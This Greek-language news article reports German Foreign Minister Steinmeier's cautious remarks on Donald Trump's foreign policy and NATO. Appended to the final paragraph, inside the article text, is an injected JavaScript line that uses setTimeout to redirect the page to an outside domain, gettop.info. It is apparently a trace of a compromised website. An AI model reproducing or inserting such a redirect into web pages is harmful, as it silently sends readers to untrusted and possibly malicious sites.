Σταϊνμάγερ για Τραμπ: Να μην φοβόμαστε όπως ο λαγός το φίδι

0
9

 

Επιφυλακτικός εμφανίστηκε στις δηλώσεις του σχετικά με τον Ντόναλντ Τραμπ ο υπουργός Εξωτερικών της Γερμανίας Φρανκ-Βάλτερ Σταϊνμάγερ σε συνέντευξή του στο ΑRD.

«Μέχρι στιγμής γνωρίζουμε λίγα για το τι θέλει» επεσήμανε και συμπλήρωσε πως δεν πιστεύει ότι θα ακολουθήσει πολιτική κατά του ΝΑΤΟ, ενώ επσήμανε πως έως τώρα δεν είναι πολύ γνωστά τα σχέδιά του σε θέματα εξωτερικής πολιτικής: «Επ’ αυτών, ο Ντόναλντ Τραμπ αποκάλυψε σχετικά λίγα» κατά την προεκλογική περίοδο, όπως σημείωσε.

Μάλιστα, σημείωσε χρακτηριστικά πως «το εκλογικό αποτέλεσμα ήταν διαφορετικό από αυτό το οποίο θα επιθυμούσαν οι Γερμανοί».

Πάντως, οπως σημειωσε ο κ. Σταϊνμάγερ, ασυνήθιστο ήταν το γεγονός ότι οι σύμβουλοι του Τραμπ δεν εμφανίστηκαν στην Ευρώπη, ενώ συνήθως οι έμπιστοι των υποψήφιων προέδρων της Αμερικής συστήνονται στους συμμάχους, ώστε να κάνουν γνωστές σε γενικές γραμμές τις απόψεις τους, αλλά ακόμη και ο πρώην υπουργός Εξωτερικών των ΗΠΑ Χένρι Κίσινγκερ, δεν έχει ιδέα τι σχεδιάζει ο Τραμπ, σημείωσε ο Γερμανός ΥΠΕΞ.

Δεν θεωρεί ότι τους «υποτιμητικούς χαρακτηρισμούς» για το ΝΑΤΟ εκ μέρους του νέου Αμερικανού προέδρου θα ακολουθήσουν πράξεις και παρέπεμψε σε μια γερμανική παροιμία, λέγοντας πως δεν πρέπει «να φοβόμαστε όπως ο λαγός το φίδι, αλλά να περιμένουμε να δούμε σε ποιο σημείο βρισκόμαστε».

Η Γερμανία οφείλει μεν πολλά στους Αμερικανούς αλλά «δεν είμαστε ίδιοι από κάθε άποψη, έχουμε τη δική μας πολιτική κολτούρα» τόνισε επίσης ο Στάινμαϊερ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here